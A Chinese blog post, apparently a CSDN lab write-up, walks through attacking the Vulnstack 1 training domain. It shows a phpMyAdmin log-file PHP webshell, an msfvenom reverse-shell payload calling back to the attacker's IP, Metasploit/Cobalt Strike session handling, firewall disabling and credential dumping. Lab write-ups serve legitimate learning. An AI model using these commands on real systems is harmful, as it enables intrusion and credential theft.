Vulnstack(1)

最新推荐文章于 2024-05-03 14:06:03 发布
最新推荐文章于 2024-05-03 14:06:03 发布
阅读量285 收藏 1
点赞数
分类专栏: # 靶机实战 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ppbgi/article/details/117251274
版权

信息收集

  • 进行ip的扫描以及开放端口的探测:
    在这里插入图片描述
    在这里插入图片描述

在这里插入图片描述
扫描到有80端口,进行访问:
在这里插入图片描述

  • 尝试在phpstuday中能获得的信息,发现有输入框,尝试弱口令:
    在这里插入图片描述

在这里插入图片描述

  • 发现可以登录,进行目录后台的扫描:
    在这里插入图片描述

在这里插入图片描述
发现有phpmyadmin目录,进行登录:
在这里插入图片描述
然后尝试写入一句话木马来获取shell:
在这里插入图片描述

show variables  like  '%general%';   #查看日志状态
SET GLOBAL general_log='on'      #开启general
set global general_log_file='C:/phpstudy/www/yxcms/backdoor.php';     #将路径改为
SELECT "<?PHP @EVAL($_POST['zyx']);?>"       #一句话木马

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在本地进行连接测试:
在这里插入图片描述
上蚁剑进行连接:
在这里插入图片描述

内网信息收集

whoami

在这里插入图片描述
在这里插入图片描述
发现外网网卡:192.168.1.0
以及内网网卡:192.168.52.0

net config Workstation

在这里插入图片描述
在该域内存在三台机器;

net view /domain:god # 查看用户

在这里插入图片描述

后渗透阶段(MSF与CS联用)

利用kali生成payload,然后上传到目标主机上:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.133 LPORT=6666 -f exe -o AC.exe # ip是自己kali的ip,端口是监听端口,-o输出到文件

在这里插入图片描述
在这里插入图片描述
然后在kali中进行shell的反弹:

use exploit/multi/handler  //进入该模块
 set payload windows/meterpreter/reverse_tcp //设置payload
 show options 
 set lhost 192.168.1.133
 set lport 6666

在这里插入图片描述
在kali中设置好之后,在目标主机中打开上传的payload
在这里插入图片描述
此时,就可以拿到目标主机的shell:
在这里插入图片描述
然后退出当前模块,进入使用

use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.133
set lport 7777
set session 1
set DisablePayloadHandler true   //payload_inject执行之后会在本地产生一个新的handler

在这里插入图片描述
此时在cb中有反弹:
在这里插入图片描述

  • 内网信息收集:
    在cb中进行操作:
sleep 2 //设置时间
shell whoami
shell hostname
shell net users
net localgroup administrators
shell systeminfo
shell tasklist //查看进程
shell net view /domain //查看域
shell net view /domain:GOD //查看域内全部主机

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
【后面的信息由于网络的原因以及个人PC问题,卡住了,没有显示…】但可以得到liukaifeng01是有管理员权限的。

内网渗透

  • 利用漏洞进行提权
    在这里插入图片描述
    成功会获取system权限:
    在这里插入图片描述
    在这里插入图片描述
  • 横向移动
#关闭防火墙  
shell netsh firewall show state //显示状态
shell netsh advfirewall set allprofiles state off //关闭防火墙

在这里插入图片描述
在这里插入图片描述
然后在进行域内的机器的信息收集:

shell net view

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

  • 域控列表
net dclist
net user
hashdump //抓取hash的hex密码
logonpasswords  //获取明文

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

凭证信息:
在这里插入图片描述

  • 攻击域控
    在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
然后重复了几次,整个域沦陷!!!

在这里插入图片描述
【通过此次的实验,对CS、MSF有了更深的了解,对内网渗透有了一定的感触,还对前端渗透的方式有了更深的感触!也体会到了信息收集的重要性!!】

Hero.Youth
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnStack实战(一)超级实战
weixin_51198941的博客
07-14 789
查看了一下,把敏感信息收集起来,比如网站根目录,开启的什么敏感文件,然后我们往下边翻的时候,发现有一个登录框,用常见的弱口令试了一下,发现root,root能登录。当前域名为god,登录用户是administrator,且存在两个网卡,分别是192.168.22.133(外网)和192.168.52.143(内网)net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域。共有三台机器,Win7是对外的web机,Win2003和Win2008(DC)是内网机器。
【红日靶场】vulnstack1-完整渗透过程
信安是不可或缺的一部分!
09-26 1166
大家有兴趣可以尝试获取,也可以通过网上披露的已知漏洞进行攻击,也可以做深入的代码审计方法很多,包括使用永痕之蓝漏洞,msf可以直接提到system权限,这里不在继续。没有识别到杀软,可以做msf上线或者做内网穿透或者冰蝎隧道(不推荐),看个人选择,也可以上线cs,做横向移动或者权限维持,这里我选择做简单的权限维持。因为版本很多已知漏洞无法使用有一些POC:https://www.exploit-db.com/exploits/25003。上传图片成功但是需要审核:这里就不能上传了,找一下后台登录点。
2024年网安最全Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
最新发布
2401_84252281的博客
05-03 913
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。
渗透测试之Vulnstack1内网域渗透
LvHLong的博客
04-27 3296
使用dirsearch扫描目录 python dirsearch.py -u http://192.168.234.177/ -i 200,301 发现备份文件 beifen.rar 和 phpmyadmin 使用 Nmap 扫描
Vulnstack----1、ATT&CK红队评估实战靶场一
七天
08-01 1148
3、敏感目录:http://192.168.144.132/phpMyadmin。4、发现yxcms:http://192.168.144.132/yxcms。192.168.52.143:存在MS17-010。192.168.52.138:存在MS17-010。域用户:dev1、root-tvi862ubeh。win7内网ip:192.168.52.143。1、ip地址:192.168.144.132。内网ip地址:192.168.52.143。内网网段:192.168.52.0/24。
Vulnstack(一)
iO快到碗里来
11-12 9478
0x00 Preface 网上有很多关于 Vulnstack(一) 的优质文章,本篇文章仅用于记录笔者自身的学习过程。 0x01 环境准备 共有三台机器,Win7是对外的web机,win2003和win2008是内网机器。 VM1(Win7)添加一块网卡,分别设置为:VMnet1(仅主机模式)、VMnet8(NAT模式) VM2(Win2003)网卡设置为:VMnet1(仅主机模式) VM2(Win2008)网卡设置为:VMnet1(仅主机模式) 打开Win2003、Win2008,输入默认
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
Skype安装程序
07-28
最新版Skype即时通讯工具。Skype即时通讯工具是国际上最流行的即时通讯工具,由俄罗斯人创造,现在被美国微软公司收购,已经替代了过去的MSN和ICQ,为当今世界最流行的语音通讯工具
内网渗透之Vulnstack4靶场的全方位打法
xf555er的博客
12-29 1481
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows域控制器,能让攻击者伪造Kerberos票据,获取域内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在网络中随意访问和控制资源。
Vulnstack 红队(一)
菜鸟的学习笔记
06-02 8110
Vulnstack 红队(一) 靶机为红日安全分享的靶机 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 笔记参考资料如下: CSDN——谢公子 FreeBuf——红日安全团队专栏 CSDN——assless 序 本次网络环境为两个虚拟网络。 192.168.72.0/24为模拟公网环境。(Vmnet2) 192.168.52.0/24为模拟内网环境。(Vmnet1) 攻击者机器与win7的第一张网卡处于Vmnet1。(模拟公网) win7的
vulnstack(一)
qq_63928796的博客
03-17 723
三台机器在同一内网中,win7 web服务开放在外网,只能通过拿下win7后将其作为跳板进行横向渗透,拿下win2008和win2003服务器。就可以了。
vulnstack内网靶场渗透测试
three_1996的博客
03-19 650
【代码】vulnstack内网靶场渗透测试。
信息收集总结—vulnstack1
tlovejr的博客
04-28 2195
前言 这几天也在做vulnstack1–红队靶机,其中渗透到win7主机时有好多内网主机信息收集的环节,今天也就给大家仔细的说下 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 信息收集 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞: systeminfo 查看启动进程,可以根据启动进程判断主机在域中扮演的角色: net start 查看进程列表:
红日安全ATT&CK靶机实战系列之vulnstack1
黑白的博客
04-13 6707
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 边下载着,可以开始vmware的网络配置 下图为官方给出的,从虚拟机网络来看 攻击者:kali+windows的攻击机 VM1:对外边界服务器,win7 VM2:域成员,2003 VM3:域控,2008 所以这中间出现两个网段,一个外网网段,一个内网网段 鉴于需要两个网段,我们需要在vmware上做一些配置 首先,用一
vulnstack(一) 红日靶场复现
BuNahua的博客
09-01 2681
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Vulnstack-内网靶场1-通关解析
小小小屿屿屿的博客
04-12 377
上传木马文件到目标主机,然后kali使用multi/handler模块进行监听,然后在蚁剑运行上传的木马文件,即可获取权限,这一次直接提权即可。结合之前端口扫描,我们使用exploit/windows/smb/psexec模块,然后进行横向渗透。结果:全部C段网站都存活 ===> 挂代理用kali扫不动,于是便换成CS进行C段扫描。CS生成木马文件,将木马文件上传到目标服务器,运行,然后直接进行提权。网上搜索phpmyadmin历史漏洞。首先ipconfig看一下IP地址。====> 并发现有域的存在。
红日靶场(一)vulnstack1 渗透过程分析
记录学习,一起进步
08-21 340
红日靶场(一)vulnstack1 渗透过程分析
[内网渗透]——VulnStack (一)
Sentiment的博客
04-21 1683
网络拓扑图 VMware 网络配置 虚拟网络名称 网段 DHCP VMnet3 192.168.72.0/24 是 VMnet4 192.168.52.0/24 是 虚拟机网络配置 虚拟机 网段 虚拟机接口 Windows 7 x64 192.168.72.0/24 192.168.52.0/24 VMnet3,VMnet4 Win2K3 Metasploitable 192.168.52.0/24 VMnet4 Windows Server 2008 R
红日(vulnstack)1 内网渗透ATT&CK实战
m0_66299232的博客
02-27 698
8.link 192.168.52.138 成功上线cs,执行shell whoami 管理员权限,成功拿下!win7 192.168.111.128 192.168.52.143 自定义网卡4,自定义网卡3。kali 192.168.1.108 192.168.111.129 桥接一块,自定义网卡4。开启之后数据库所有运行的日志会记录在general_log_file中。4.net use 发现建立成功后,上传木马程序。1.开启cs,生成木马,上传到蚁剑,执行。6.成功执行,whomi发现是系统权限。红日
红日靶场VulnStack1
10-08
对于红日靶场VulnStack1,我了解到它是一个虚拟机中的漏洞靶场。这个靶场主要用于学习和实践网络安全方面的知识,其中包含了一些常见的漏洞,供用户进行渗透测试和漏洞攻击的实战练习。 由于我是一个AI模型,并没有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值